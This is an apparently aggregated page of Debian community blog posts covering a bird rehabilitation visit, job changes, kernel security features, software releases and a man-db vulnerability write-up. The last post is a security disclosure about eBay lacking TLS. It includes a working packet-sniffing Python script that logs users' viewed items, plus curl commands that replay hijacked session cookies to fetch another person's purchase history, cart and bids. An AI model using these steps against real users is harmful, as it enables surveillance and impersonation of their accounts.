On the second/third day Chirayu (pictured, extreme left) shared the idea of going to Eagle Encounters. Other people pictured in the picture are yours truly, some of the people from GSOC, KK is in the middle, the driver Leonard something who took us to Eagle Encounters on the right (pictured extreme right).

Update – I was informed that it was a joint plan between Chirayu and KK. They also had some other options planned which later got dropped by the wayside.

The whole gang/group along with Leonard coming from eagle encounters

It was supposed to be somewhat near, (Spier, Stellenbosch). While I was not able to able to see/figure out where ‘Eagle Encounters’ is on Openstreetmap, somebody named Firefishy added Spier to OSM few years back. So thank you for that Firefishy so I can at least pin-point a closer place.

I didn’t see/know/try to figure out about the place as Chirayu said it’s a ‘zoo’. I wasn’t enthusiastic as much as I had been depressed by most zoos in India, while you do have national reserves/Parks in India where you see animals in their full glory.

I have been lucky to been able to seen Tadoba and Ranthambore National parks and spend some quality time (about a week) to have some idea as to what can/happens in forests and people living in the buffer-zones but those stories are for a different day altogether.

I have to say I do hope to be part of the Ranthambore experience again somewhere in the future, it really is a beautiful place for flora and fauna and fortunately or unfortunately this is the best time apart from spring, as you have the game of mist/fog and animals . North India this time of the year is something to be experienced.

I wasn’t much enthused as “zoos” in India are claustrophobic for animals and people both. There are small cages and you see and smell the shit/piss of the animals, generally not a good feeling.

Chirayu shared with us also the possibility of being able to ride of Segways and range of bicycles which relieved me so that in case we didn’t enjoy the ‘zoo’ we would enjoy the Segway at least and have a good time (although it would have different expenses than the ones at Eagle Encounters).

My whole education about what a zoo could be was turned around at Eagle Encounters as it seems to be somewhere between a zoo and what I know as national parks where animals roam free.

We purchased the tickets and went in, the first event/happening was ‘Eagle Encounters’ itself.

One of the families at Eagle Encounter handling a snowy eagle

Our introduction to the place started by two beautiful volunteer/trainers who were in charge of all the birds in the Eagle Encounters vicinity. The introduction started by every one of us who came for the ‘Eagle Encounter’ show to wear a glove and to have/hold one of the pair of snowy owls to sit on the glove. That picture is of a family who was part of our show.

Before my turn came, I was a little apprehensive/worried about holding a Owl -period. To my surprise, they were so soft and easy-going, I could hardly feel the weight on my hand.

While the trainer/volunteers were constantly feeding them earthworm-bits (I didn’t ask, just guessing) and we were all happy as they along with the visitors were constantly playing and interacting with the birds, sharing with us the life-cycle of the snowy Owl. It’s only then I understood why in the Harry Potter Universe, the owl plays such an important part. They seem to be a nice, curious, easy-going, proud creatures which fits perfectly in the HP Universe.

In hind-sight I should have videod the whole experience as the trainer/volunteer showed a battery of owls, eagles, vultures, Hawks (different birds of prey) what have you. I have to confess my knowledge of birds is and was non-existent.

Vulture at the Eagle Encounters show

Vulture, One of the larger birds we saw at the Eagle Encounters show. Some of the birds could be dangerous, especially in the wild.

The other trainer showing off a Black Eagle at Eagle Encounters

That was the other Volunteer-Trainer who was showing off the birds. I especially liked the t-shirt she was wearing. The shop at Eagle Encounters had whole lot of them, they were a bit expensive and just not my size😦

Tidbit – Just a few years ago, it was a shocker to me to know/realize that what commonly goes/known in the country as a parrot by most people is actually a Parakeet. As can be seen in the article linked, they are widely distributed in India.

While I was young, I used to see the rose-ringed parakeets quite a bit around but nowadays due to probably pollution and other factors, they are noticeably less. They are popular as pets in India. I don’t know what Pollito would think about that, don’t think he would think good.

Trainer showing off a Hawk at Eagle Encounters

As I cannot differentiate between Hawk, Vulture, Eagle, etc. I would safely say ‘a Bird of Prey’ as that was what he was holding. This photo was taken after the event was over where we all were curious to know about the volunteer/trainer, their day job and what it meant for them to be taking care of these birds.

Update – KK has shared with me what those specific birds are called, so in case the names or species are wrong, please take the truck with her and not me.

While I don’t remember the name of the trainer/volunteer, among other things it was shared that the volunteers/trainers aren’t paid enough and they never have enough funds to take care of all the birds who come to them.

Trainer showing Hawk and background chart

Where the picture was shot (both this and earlier) was sort of open-office. If you look closely, you will see that there are names of the birds, for instance, people who loved LOTR would easily see ‘Gandalf’ . that board lists how much food (probably in grams) did the bird eat in a day and week.

While it was not shared, I’m sure there would be a lot of paperwork, studies to get the birds as well as possible. From a computer science perspective, there seemed to be lot of potential for avian and big-data professionals to do lot of computer modelling and analysis and give more insight into the rehabilitation efforts so the process could be more fine-tuned, efficient and economic perhaps.

Hawk on stand

This is how we saw the majority of the birds. Most of them had a metal/plastic string which was tied to small artificial branches as the one above.

I forgot to share a very important point. Eagle Encounters is not a zoo but a Rehabilitation Centre.

While the cynic/skeptic part of me tried to not feel or see the before and after pictures of the birds bought to the rehabilitation centre, the caring part was moved to see most of the birds being treated with love and affection. From our conversations with the Volunteer-Trainer it emerged that every week they had to turn away lots of birds due to space constraints. It is only the most serious/life-threatening cases for which they could provide care in a sustainable way they would keep.

Some of the birds who were in the cages were large, airy. I wouldn’t say clean as what little I read before as well later is that birds shit enormously so cleaning cages is quite an effort. Most of the cages and near those artificial branches there were placards of people who were sponsoring a bird or two to look after them.

From what was shared, many of the birds who came had been abused in many ways. Some of them had their bones crushed or/and other cruel ways. As I had shared that I had been wonderfully surprised by seeing birds come so close to me and most of my friends, I felt rage about those who had treated the birds in such evil, bad ways.

What was shared with us that while they try to heal the birds as much as possible, it is always suspect how well the birds would survive on their own in nature, hence many of these birds would go to the sponsor or to some other place when they are well.

The Secretary birds - cage- sponsors-adopted

If you look at the picture closely, maybe look at the higher resolution photo in the gallery, you will see that both the birds have been adopted by two different couples. The birds as the name tag shows are called ‘Secretaries’.

The Secretaries make a typical sound which is similar to the sound made by old typewriters. Just as woodpeckers make Morse Code noises when they are pecking with their beaks on trees, something similar to the sound of keys emitted by Old Remington typewriters when clicked on was done by the Secretaries.

One of the birds in the cage,

This is one of the birds in one of the few cages. If you see a higher-resolution picture of the earlier picture, the one which has ‘Secretaries’. Also as can be seen in the picture, there is wood-working happening and they are trying to expand the Rehabilitation Centre.

All in all, an excursion which was supposed to be for just an hour, extended to something like 3 odd hours. KK shot more than a 1000 odd pictures while trying to teach/converse in Malyalam to some of the birds.

She shot well over 1000 photos which would have filled something like 30 odd traditional photo albums. Jaminy (KK’s partner-in-crime) used her selfie stick to desired effect, taking pictures with most of the birds as one does with celebrities.

I had also taken some but most of them were over-exposed as was new to mobile photography at that time, still am but mostly it works.

Lake with Barn Owls near Eagle Encounters

That is the lake we discovered/saw after coming back from Eagle Encounters. We had good times.

Lastly, a virtual prize distribution ceremony –

a. Chirayu and KK – A platinum trophy for actually thinking and pitching the place in the first place.

b. Shirish and Deven Bansod – Metal cups for not taking more than 10 minutes to freshen up and be back after hearing the plan to go to Eagle Encounters.

c. All the girls/women – Spoons for actually making it to the day. All the girls took quite sometime to freshen up, otherwise it might have been possible to also experience the Segways, who knows.

All-in-all an enjoyable day spent in being part of ‘Eagle Encounters’ .


Filed under: Miscellenous Tagged: #Birds of Prey, #Debconf16, #Eagle Encounters, #Rehabilitation, #South African History, #Stellenbosch

13 December, 2016 11:15PM by shirishag75

hackergotchi for Martin Pitt

Martin Pitt

The alphabet and pitti end here: Last day at Canonical

I’ve had the pleasure of working on Ubuntu for 12½ years now, and during that time used up an entire Latin alphabet of release names! (Well, A and C are still free, but we used H and W twice, so on average.. ☺ ) This has for sure been the most exciting time in my life with tons of good memories! Very few highlights:

  • Getting some spam mail from a South African multi-millionaire about a GREAT OPPORTUNITY
  • Joining #warthogs (my first IRC experience) and collecting my first bounties for “derooting” Debian (i. e. drop privileges from root daemons and suid binaries)
  • Getting invited to Oxford to meet a bunch of people for which I had absolutely zero proof of existence, and tossing myself into debts for buying a laptop for that occasion
  • Once being there, looking into my fellows’ stern and serious faces and being amazed by their professionalism:
  • The excitement and hype around going public with Warty Warthogs Beta
  • Meeting lots of good folks at many UDSes, with great ideas and lots of enthusiasm, and sometimes “Bags of Death”. Group photo from Ubuntu Down Under:
  • Organizing UDSes without Launchpad or other electronic help:
     
  • Playing “Wish you were Here” with Bill, Tony, Jono, and the other All Stars
  • Seeing bug #1 getting closed, and watching the transformation of Microsoft from being TEH EVIL of the FOSS world to our business partner
  • Getting to know lots of great places around the world. My favourite: luring a few colleagues for a “short walk through San Francisco” but ruining their feet with a 9 hour hike throughout the city, Golden Gate Park and dipping toes into the Pacific.
  • Seeing Ubuntu grow from that crazy idea into one of the main pillars of the free software world
  • ITZ GTK BUG!
  • Getting really excited when Milbank and the Canonical office appeared in the Harry Potter movie
  • Moving between and getting to know many different teams from the inside (security, desktop, OEM, QA, CI, Foundations, Release, SRU, Tech Board, …) to appreciate and understand the value of different perspectives
  • Breaking burning wood boards, making great and silly videos, and team games in the forest (that was La Mola) at various All Hands

But all good things must come to an end — after tossing and turning this idea for a long time, I will leave Canonical at the end of the year. One major reason for me leaving is that after that long time I am simply in need for a “reboot”: I’ve piled up so many little and large things that I can hardly spend one day on developing something new without hopelessly falling behind in responding to pings about fixing low-level stuff, debugging weird things, handholding infrastructure, explaining how things (should) work, do urgent archive/SRU/maintenance tasks, and whatnot (“it’s related to boot, it probably has systemd in the name, let’s hand it to pitti”). I’ve repeatedly tried to rid myself of some of those or at least find someone else to share the load with, but it’s too sticky :-/ So I spent the last few weeks with finishing some lose ends and handing over some of my main responsibilities.

Today is my last day at work, which I spend mostly on unsubscribing from package bugs, leaving Launchpad teams, and catching up with emails and bugs, i. e. “clean up my office desk”. From tomorrow on I’ll enjoy some longer EOY holidays, before starting my new job in January.

I got offered to work on Cockpit, on the product itself and its ties into the Linux plumbing stack (storaged/udisks, systemd, and the like). So from next year on I’ll change my Hat to become Red instead of orange. I’m curious to seeing for myself how that other side of the fence looks like!

This won’t be a personal good-bye. I will continue to see a lot of you Ubuntu folks on FOSDEMs, debconfs, Plumber’s, or on IRC. But certainly much less often, and that’s the part that I regret most — many of you have become close friends, and Canonical feels much more like a family than a company. So, thanks to all lof you for being on that journey with me, and of course a special and big Thank You to Mark Shuttleworth for coming up with this great Ubuntu vision and making all of this possible!

13 December, 2016 11:38AM by pitti

hackergotchi for Ben Hutchings

Ben Hutchings

Debian LTS work, November 2016

I was assigned 11 hours of work by Freexian's Debian LTS initiative. I worked 9 hours and carry over 2 hours.

In my role as Linux 3.2 stable maintainer, I made a 3.2.84 release with a large number of backported fixes. I then rebased wheezy's linux package on this and made some additional changes to maintain the kernel module ABI. This will probably be released some time in December or January, depending on what security issues turn up.

13 December, 2016 05:10AM

December 12, 2016

hackergotchi for Jonathan McDowell

Jonathan McDowell

No longer a student. Again.

99 Problems

(image courtesy of XKCD)

Last week I graduated with a Masters in Legal Science (now taught as an MLaw) from Queen’s University Belfast. I’m pleased to have achieved a Distinction, as well an award for Outstanding Achievement in the Dissertation (which was on the infringement of privacy by private organisations due to state mandated surveillance and retention laws - pretty topical given the unfortunate introduction of the Investigatory Powers Act 2016). However, as previously stated, I had made the decision that I was happier building things, and wanted to return to the world of technology. I talked to a bunch of interesting options, got to various stages in the hiring process with each of them, and happily accepted a role with Titan IC Systems which started at the beginning of September.

Titan have produced a hardware accelerated regular expression processor (hence the XKCD reference); the RXP in its FPGA variant (what I get to play with) can handle pattern matching against 40Gb/s of traffic. Which is kinda interesting, as it lends itself to a whole range of applications from network scanning to data mining to, well, anything where you want to sift through a large amount of data checking against a large number of rules. However it’s brand new technology for me to get up to speed with (plus getting back into a regular working pattern rather than academentia), and the combination of that and spending most of the summer post DebConf wrapping up the dissertation has meant I haven’t had as much time to devote other things as I’d have liked. However I’ve a few side projects at various stages of completion and will try to manage more regular updates.

12 December, 2016 10:27PM

hackergotchi for Kees Cook

Kees Cook

security things in Linux v4.9

Previously: v4.8.

Here are a bunch of security things I’m excited about in the newly released Linux v4.9:

Latent Entropy GCC plugin

Building on her earlier work to bring GCC plugin support to the Linux kernel, Emese Revfy ported PaX’s Latent Entropy GCC plugin to upstream. This plugin is significantly more complex than the others that have already been ported, and performs extensive instrumentation of functions marked with __latent_entropy. These functions have their branches and loops adjusted to mix random values (selected at build time) into a global entropy gathering variable. Since the branch and loop ordering is very specific to boot conditions, CPU quirks, memory layout, etc, this provides some additional uncertainty to the kernel’s entropy pool. Since the entropy actually gathered is hard to measure, no entropy is “credited”, but rather used to mix the existing pool further. Probably the best place to enable this plugin is on small devices without other strong sources of entropy.

vmapped kernel stack and thread_info relocation on x86

Normally, kernel stacks are mapped together in memory. This meant that attackers could use forms of stack exhaustion (or stack buffer overflows) to reach past the end of a stack and start writing over another process’s stack. This is bad, and one way to stop it is to provide guard pages between stacks, which is provided by vmalloced memory. Andy Lutomirski did a bunch of work to move to vmapped kernel stack via CONFIG_VMAP_STACK on x86_64. Now when writing past the end of the stack, the kernel will immediately fault instead of just continuing to blindly write.

Related to this, the kernel was storing thread_info (which contained sensitive values like addr_limit) at the bottom of the kernel stack, which was an easy target for attackers to hit. Between a combination of explicitly moving targets out of thread_info, removing needless fields, and entirely moving thread_info off the stack, Andy Lutomirski and Linus Torvalds created CONFIG_THREAD_INFO_IN_TASK for x86.

CONFIG_DEBUG_RODATA mandatory on arm64

As recently done for x86, Mark Rutland made CONFIG_DEBUG_RODATA mandatory on arm64. This feature controls whether the kernel enforces proper memory protections on its own memory regions (code memory is executable and read-only, read-only data is actually read-only and non-executable, and writable data is non-executable). This protection is a fundamental security primitive for kernel self-protection, so there’s no reason to make the protection optional.

random_page() cleanup

Cleaning up the code around the userspace ASLR implementations makes them easier to reason about. This has been happening for things like the recent consolidation on arch_mmap_rnd() for ET_DYN and during the addition of the entropy sysctl. Both uncovered some awkward uses of get_random_int() (or similar) in and around arch_mmap_rnd() (which is used for mmap (and therefore shared library) and PIE ASLR), as well as in randomize_stack_top() (which is used for stack ASLR). Jason Cooper cleaned things up further by doing away with randomize_range() entirely and replacing it with the saner random_page(), making the per-architecture arch_randomize_brk() (responsible for brk ASLR) much easier to understand.

That’s it for now! Let me know if there are other fun things to call attention to in v4.9.

© 2016, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

12 December, 2016 07:05PM by kees

hackergotchi for Michal Čihař

Michal Čihař

Gammu 1.38.0

Today Gammu 1.38.0 has been released. Changes in last two testing releases have been stabilized and this is the outcome. You can expect changes in API or SMSD tables as well as some additional features.

Also this is first stable release after several years which comes with Windows binaries. These are built using AppVeyor and will help bring Windows users back to latest versions.

Full list of changes and new features can be found on Gammu 1.38.0 release page.

Would you like to see more features in Gammu? You an support further Gammu development at Bountysource salt or by direct donation.

Filed under: Debian English Gammu | 0 comments

12 December, 2016 05:00PM

hackergotchi for Thomas Lange

Thomas Lange

Two months full of FAI work

The last months were filled with a lot of FAI work. After the release that supports the creation of disk images, I attended the Debian cloud sprint in Seattle. During the sprint, we've looked at some image creation tools and I gave a short demo of the new fai-diskimage command. We've decided to evaluate FAI for creating official Debian cloud images!

We've created the FAI configuration for GCE images during the sprint and Sam has now moved his own setup from vmdebootstrap to FAI report.

A few weeks ago, I gave a FAI training in cologne for a customer. The participants really loved FAI and they will use it for CentOS, OpenSUSE, Debian and Ubuntu because FAI perfectly fits into their needs Giving this training was a pleasure for me because the participants were really good and they've learned everything about FAI.

Later, I wrote some new code for detecting unknown packages names for the command install_packages, which is needed because aptiude does not handle this any more.

I've finally released the new version FAI 5.3.2 and also created new ISO images which are now available at http://fai-project.org/fai-cd/.

FAI cloud

12 December, 2016 03:54PM

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

RcppCCTZ 0.1.0

A new version 0.1.0 of RcppCCTZ arrived on CRAN this morning. It brings a number of new or updated things, starting with new upstream code from CCTZ as well as a few new utility functions.

CCTZ is a C++ library for translating between absolute and civil times using the rules of a time zone. In fact, it is two libraries. One for dealing with civil time: human-readable dates and times, and one for converting between between absolute and civil times via time zones. It requires only a proper C++11 compiler and the standard IANA time zone data base which standard Unix, Linux, OS X, ... computers tend to have in /usr/share/zoneinfo. RcppCCTZ connects this library to R by relying on Rcpp.

A nice example is the helloMoon() function (based on an introductory example in the CCTZ documentation) showing the time when Neil Armstrong took a small step, relative to local time in New York and Sydney:

R> library(RcppCCTZ)
R> helloMoon(verbose=TRUE)
1969-07-20 22:56:00 -0400
1969-07-21 12:56:00 +1000
                   New_York                      Sydney 
"1969-07-20 22:56:00 -0400" "1969-07-21 12:56:00 +1000" 
R> 

The new formating and parsing functions are illustrated below with default arguments for format strings and timezones. All this can be customized as usual.

R> example(formatDatetime)

frmtDtR> now <- Sys.time()

frmtDtR> formatDatetime(now)            # current (UTC) time, in full precision RFC3339
[1] "2016-12-12T13:21:03.866711+00:00"

frmtDtR> formatDatetime(now, tgttzstr="America/New_York")  # same but in NY
[1] "2016-12-12T08:21:03.866711-05:00"

frmtDtR> formatDatetime(now + 0:4)     # vectorised
[1] "2016-12-12T13:21:03.866711+00:00" "2016-12-12T13:21:04.866711+00:00" "2016-12-12T13:21:05.866711+00:00"
[4] "2016-12-12T13:21:06.866711+00:00" "2016-12-12T13:21:07.866711+00:00"
R> example(parseDatetime)

prsDttR> ds <- getOption("digits.secs")

prsDttR> options(digits.secs=6) # max value

prsDttR> parseDatetime("2016-12-07 10:11:12",        "%Y-%m-%d %H:%M:%S");   # full seconds
[1] "2016-12-07 04:11:12 CST"

prsDttR> parseDatetime("2016-12-07 10:11:12.123456", "%Y-%m-%d %H:%M:%E*S"); # fractional seconds
[1] "2016-12-07 04:11:12.123456 CST"

prsDttR> parseDatetime("2016-12-07T10:11:12.123456-00:00")  ## default RFC3339 format
[1] "2016-12-07 04:11:12.123456 CST"

prsDttR> now <- trunc(Sys.time())

prsDttR> parseDatetime(formatDatetime(now + 0:4))               # vectorised
[1] "2016-12-12 07:21:17 CST" "2016-12-12 07:21:18 CST" "2016-12-12 07:21:19 CST"
[4] "2016-12-12 07:21:20 CST" "2016-12-12 07:21:21 CST"

prsDttR> options(digits.secs=ds)
R>

Changes in this version are summarized here:

Changes in version 0.1.0 (2016-12-11)

  • Synchronized with CCTZ upstream.

  • New parsing and formating helpers for Datetime vectors

  • New parsing and formating helpers for (two) double vectors representing full std::chrono nanosecond resolutions

  • Updated documentation and examples.

We also have a diff to the previous version thanks to CRANberries. More details are at the RcppCCTZ page; code, issue tickets etc at the GitHub repository.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

12 December, 2016 12:27PM

hackergotchi for Michal Čihař

Michal Čihař

New location for Weblate

Today, Weblate got new home. The difference is not that big - it has been moved from my personal GitHub account to WeblateOrg organization.

The main motivation is to have all Weblate related repositories in one location (all others including wlc, Docker or website are already there). The move will also allow to better manage the project in future as having it in separate repositories provides less management options on GitHub than using organization.

In case you have cloned the git repository, please update

git remote set-url origin https://github.com/WeblateOrg/weblate.git

Of course all issue tracker locations have changed as well (I believe the redirect on GitHub will stay as long as I won't fork the repository, so expect it to work at least month). See GitHub documentation on repository moving.

I'm sorry for all the troubles, but I think this is really necessary move.

Filed under: Debian English SUSE Weblate | 0 comments

12 December, 2016 12:00PM

hackergotchi for Paul Tagliamonte

Paul Tagliamonte

DNSync MAC Addresses

I’ve been hacking on a project on and off for my LAN called DNSync. This will take a DNSMasq leases file and sync it to Amazon Route 53.

I’ve added a new feature, which will create A reccords for each MAC address on the LAN.

Since DNSync won’t touch CNAME records, I use CNAME records (manually) to point to the auto-synced A records for services on my LAN (such as my Projector, etc).

Since It’s easy for two machines to have the same name, I’ve decided to add A records for each MAC as well as their client name. They take the fomm of something like ab-cd-ef-ab-cd-ef.by-mac.paultag.house., which is harder to accedentally collide.

12 December, 2016 03:30AM

December 11, 2016

hackergotchi for Colin Watson

Colin Watson

The sad tale of CVE-2015-1336

Today I released man-db 2.7.6 (announcement, NEWS, git log), and uploaded it to Debian unstable. The major change in this release was a set of fixes for two security vulnerabilities, one of which affected all man-db installations since 2.3.12 (or 2.3.10-66 in Debian), and the other of which was specific to Debian and its derivatives.

It’s probably obvious from the dates here that this has not been my finest hour in terms of responding to security issues in a timely fashion, and I apologise for that. Some of this is just the usual life reasons, which I shan’t bore you by reciting, but some of it has been that fixing this properly in man-db was genuinely rather complicated and delicate. Since I’ve previously advocated man-db over some of its competitors on the basis of a better security posture, I think it behooves me to write up a longer description.

I took over maintaining man-db over fifteen years ago in slightly unexpected circumstances (I got annoyed with its bug list and made a couple of non-maintainer uploads, and then the previous maintainer died, so I ended up taking over both in Debian and upstream). I was a fairly new developer at the time, and there weren’t a lot of people I could ask questions of, but I did my best to recover as much of the history as I could and learn from it. One thing that became clear very quickly, both from my own inspection and from the bug list, was that most of the code had been written in a rather more innocent time. It was absolutely riddled with dangerous uses of the shell, poor temporary file handling, buffer overruns, and various common-or-garden deficiencies of that kind. I spent several years reworking large swathes of the codebase to be more robust against those kinds of bugs by design, and for example libpipeline came out of that effort.

The most subtle and risky set of problems came from the fact that the man and mandb programs were installed set-user-id to the man user. Part of this was so that man could maintain preformatted “cat pages”, and part of it was so that users could run mandb if the system databases were out of date (this is now much less useful since most package managers, including dpkg, support some kind of trigger mechanism that can run mandb whenever new system-level manual pages are installed). One of the first things I did was to make this optional, and this has been a disabled-by-default debconf option in Debian for a long time now. But it’s still a supported option and is enabled by default upstream, and when running setuid man and mandb need to take care to drop privileges when dealing with user-controlled data and to write files with the appropriate ownership and permissions.

My predecessor had problems related to this such as Debian #26002, and one of the ways they dealt with them was to make /var/cache/man/ set-group-id root, in order that files written to that directory would have consistent group ownership. This always struck me as rather strange and I meant to do something about it at some point, but until the first vulnerability report above I regarded it as mainly a curiosity, since nothing in there was group-writeable anyway. As a result, with the more immediate aim of making the system behave consistently and dealing with bug reports, various bits of code had accreted that assumed that /var/cache/man/ would be man:root 2755, and not all of it was immediately obvious.

This interacted with the second vulnerability report in two ways. Firstly, at some level it caused it because I was dealing with the day-to-day problems rather than thinking at a higher level: a series of bugs led me down the path of whacking problems over the head with a recursive chown of /var/cache/man/ from cron, rather than working out why things got that way in the first place. Secondly, once I’d done that, I couldn’t remove the chown without a much more extensive excursion into all the code that dealt with cache files, for fear of reintroducing those bugs. So although the fix for the second vulnerability is very simple in itself, I couldn’t get there without dealing with the first vulnerability.

In some ways, of course, cat pages are a bit of an anachronism. Most modern systems can format pages quickly enough that it’s not much of an issue. However, I’m loath to drop the feature entirely: I’m generally wary of assuming that just because I have a fast system that everyone does. So, instead, I did what I should have done years ago: make man and mandb set-group-id man as well as set-user-id man, at which point we can simply make all the cache files and directories be owned by man:man and drop the setgid bit on cache directories. This should be simpler and less prone to difficult-to-understand problems.

I expect that my next substantial upstream release will switch to --disable-setuid by default to reduce exposure, though, and distributions can start thinking about whether they want to follow that (Fedora already does, for example). If this becomes widely disabled without complaints then that would be good evidence that it’s reasonable to drop the feature entirely. I’m not in a rush, but if you do need cat pages then now is a good time to write to me and tell me why.

This is the fiddliest set of vulnerabilities I’ve dealt with in man-db for quite some time, so I hope that if there are more then I can get back to my previous quick response time.

11 December, 2016 11:42PM by Colin Watson

Sandro Tosi

What's that code: Elementary S04E09

they hacked a car and around 7:27 in the episode they are analyzing the car's computer source code, that's some sweet compression they say, but it turns out it's Perl interpreter source code, with Perl replaced with Auto (after all it's the auto code right?)

https://perl5.git.perl.org/perl.git/blob/HEAD:/perl.c#l431 and following lines

another interesting code copy was in The Americans (cant remember season or episode), when they were trying to acquire the ECHO program source code, what's on the screen is actually MATLAB source code

11 December, 2016 05:25PM by Sandro Tosi ([email protected])

Petter Reinholdtsen

Oolite, a life in space as vagabond and mercenary - nice free software

In my early years, I played the epic game Elite on my PC. I spent many months trading and fighting in space, and reached the 'elite' fighting status before I moved on. The original Elite game was available on Commodore 64 and the IBM PC edition I played had a 64 KB executable. I am still impressed today that the authors managed to squeeze both a 3D engine and details about more than 2000 planet systems across 7 galaxies into a binary so small.

I have known about the free software game Oolite inspired by Elite for a while, but did not really have time to test it properly until a few days ago. It was great to discover that my old knowledge about trading routes were still valid. But my fighting and flying abilities were gone, so I had to retrain to be able to dock on a space station. And I am still not able to make much resistance when I am attacked by pirates, so I bougth and mounted the most powerful laser in the rear to be able to put up at least some resistance while fleeing for my life. :)

When playing Elite in the late eighties, I had to discover everything on my own, and I had long lists of prices seen on different planets to be able to decide where to trade what. This time I had the advantages of the Elite wiki, where information about each planet is easily available with common price ranges and suggested trading routes. This improved my ability to earn money and I have been able to earn enough to buy a lot of useful equipent in a few days. I believe I originally played for months before I could get a docking computer, while now I could get it after less then a week.

If you like science fiction and dreamed of a life as a vagabond in space, you should try out Oolite. It is available for Linux, MacOSX and Windows, and is included in Debian and derivatives since 2011.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

11 December, 2016 10:40AM

hackergotchi for Charles Plessy

Charles Plessy

apt purge ifupdown

...oh wow, it still works... I never had realised that network-manager did not need ifupdown.

11 December, 2016 07:30AM

December 10, 2016

hackergotchi for Iain R. Learmonth

Iain R. Learmonth

The Internet of Dangerous Auction Sites

It might be that the internet era of fun and games is over, because the internet is now dangerous. – Bruce Schneier

Ok, I know this is kind of old news now, but Bruce Schneier gave testimony to the House of Representatives’ Energy & Commerce Committee about computer security after the Dyn attack. I’m including this quote because I feel it sets the scene nicely for what follows here.

Last week, I was browsing the popular online auction site eBay and I noticed that there was no TLS. For a moment, I considered that maybe my traffic was being intercepted deliberately, there’s no way that eBay as a global company would be deliberately risking users in this way. I was wrong. There is not and has never been TLS for large swathes of the eBay site. In fact, the only point at which I’ve found TLS is in their help pages and when it comes to entering card details (although it’ll give you back the last 4 digits of your card over a plaintext channel).

sudo apt install wireshark
# You'll want to allow non-root users to perform capture
sudo adduser `whoami` wireshark
# Log out and in again to assume the privileges you've granted yourself

What can you see?

They first thing I’d like to call eBay on is a statement in their webpage about Cookies, Web Beacons, and Similar Technologies:

We don’t store any of your personal information on any of our cookies or other similar technologies.

Well eBay, I don’t know about you, but for me my name is personal information. Ana, who investigated this with me, also confirmed that her name was present on her cookie when using her account. But to answer the question, you can see pretty much everything.

Using the Observer module of PATHspider, which is essentially a programmable flow meter, let’s take a look at what items users of the network are browsing:

sudo apt install pathspider

The following is a Python 3 script that you’ll need to run as root (for packet capturing) and will need to kill with ^C when you’re done because I didn’t give it an exit condition:

import logging
import queue
import threading
import email
import re
from io import StringIO

import plt

from pathspider.observer import Observer

from pathspider.observer import basic_flow
from pathspider.observer.tcp import tcp_setup
from pathspider.observer.tcp import tcp_handshake
from pathspider.observer.tcp import tcp_complete

def tcp_reasm_setup(rec, ip):
        rec['payload'] = b''
        return True

def tcp_reasm(rec, tcp, rev):
        if not rev and tcp.payload is not None:
                rec['payload'] += tcp.payload.data
        return True

lturi = "int:wlp3s0" # CHANGE THIS TO YOUR NETWORK INTERFACE
logging.getLogger().setLevel(logging.INFO)
logger = logging.getLogger(__name__)
ebay_itm = re.compile("(?:item=|itm(?:\/[^0-9][^\/]+)?\/)([0-9]+)")

o = Observer(lturi,
             new_flow_chain=[basic_flow, tcp_setup, tcp_reasm_setup],
             tcp_chain=[tcp_handshake, tcp_complete, tcp_reasm])
q = queue.Queue()
t = threading.Thread(target=o.run_flow_enqueuer,
                     args=(q,),
                     daemon=True)
t.start()

while True:
    f = q.get()
    # www.ebay.co.uk uses keep alive for connections, multiple requests
    # may be in a single flow
    requests = [x + b'\r\n' for x in f['payload'].split(b'\r\n\r\n')]
    for request in requests:
        if request.startswith(b'GET '):
            request_text = request.decode('ascii')
            request_line, headers_alone = request_text.split('\r\n', 1)
            headers = email.message_from_file(StringIO(headers_alone))
            if headers['Host'] != "www.ebay.co.uk":
                break
            itm = ebay_itm.search(request_line)
            if itm is not None and len(itm.groups()) > 0 and itm.group(1) is not None:
                logging.info("%s viewed item %s", f['sip'],
                             "http://www.ebay.co.uk/itm/" + itm.group(1))

Note: PATHspider’s Observer won’t emit a flow until it is completed, so you may have to close your browser in order for the TCP connection to be closed as eBay does use Connection: keep-alive.

If all is working correctly (if it was really working correctly, it wouldn’t be working because the connections would be encrypted, but you get what I mean…), you’ll see something like:

INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/161990905666
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/311756208540
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/131911806454
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116

It is left as an exercise to the reader to map the IP addresses to users. You do however have the hint that the first name of the user is in the cookie.

This was a very simple example, you can also passively sniff the content of messages sent and recieved on eBay (though I’ll admit email has the same flaw in a large number of cases) and you can also see the purchase history and cart contents when those screens are viewed. Ana also pointed out that when you browse for items at home, eBay may recommend you similar items and then those recommendations would also be available to anyone viewing the traffic at your workplace.

Perhaps you want to see the purchase history but you’re too impatient to wait for the user to view the purchase history screen. Don’t worry, this is also possible.

Three researchers from the Department of Computer Science at Columbia University, New York published a paper earlier this year titled The Cracked Cookie Jar: HTTP Cookie Hijacking and the Exposure of Private Information. In this paper, they talk about hijacking cookies using packet capture tools and then using the cookies to impersonate users when making requests to websites. They also detail in this paper a number of concerning websites that are vulnerable, including eBay.

Yes, it’s 2016, nearly 2017, and cookie hijacking is still a thing.

You may remember Firesheep, a Firefox plugin, that could be used to hijack Facebook, Twitter, Flickr and other websites. It was released in October 2010 as a demonstration of the security risk of session hijacking vulnerabilities to users of web sites that only encrypt the login process and not the cookie(s) created during the login process. Six years later and eBay has not yet listened.

So what is cookie hijacking all about? Let’s get hands on. This time, instead of looking at the request line, look at the Cookie header. Just dump that out. Something like:

print(headers['Cookie'])

Now you have the user’s cookie and you can impersonate that user. Store the cookie in an environment variable named COOKIE and…

sudo apt install curl
# Get the purchase history
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/PurchaseHistory > history.html
# Get the current cart contents
curl --cookie "$COOKIE" http://cart.payments.ebay.co.uk/sc/view > cart.html
# Get the current bids/offers
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/BidsOffers > bids.html
# Get the messages list
